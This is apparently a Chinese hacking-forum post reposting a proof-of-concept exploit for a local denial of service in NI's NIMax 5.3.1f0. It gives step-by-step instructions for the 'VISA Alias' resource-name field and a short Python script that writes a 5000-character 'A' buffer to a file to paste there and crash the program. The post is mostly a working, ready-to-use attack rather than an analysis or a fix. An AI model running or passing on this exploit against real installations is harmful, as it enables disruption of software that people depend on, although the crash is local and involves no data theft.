跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC)

精选回复

发布于
# Exploit Title: NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC)
# Date: 24/06/2021
# Exploit Author: LinxzSec
# Vulnerability: Local Denial of Service (DoS)
# Vendor Homepage: https://www.ni.com/en-gb.html
# Software Link: License Required - https://knowledge.ni.com/KnowledgeArticleDetails?id=kA03q000000YGQwCAO&l=en-GB
# Tested Version: 5.3.1f0
# Tested On: Windows 10 Pro x64

'''[ POC ]
1 - Copy printed "AAAAA..." string from "nimax.txt"
2 - Open NIMax.exe
3 - Drop down "My System" then drop down "Software"
5 - Locate "NI-VISA 5.2" and select it
6 - Open the "VISA Options" tab
7 - Drop down "General settings"
8 - Select "Aliases"
9 - Select "Add alias"
10 - Paste string from "nimax.txt" into "Resource name"
11 - Just put a single character in the alias and press "ok", DoS will occur
'''

buffer = "\x41" * 5000

try:
    f = open("nimax.txt", "w")
    f.write(buffer)
    f.close()
    print("[+] File created!")
except:
    print("[+] File could not be created!")
            

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。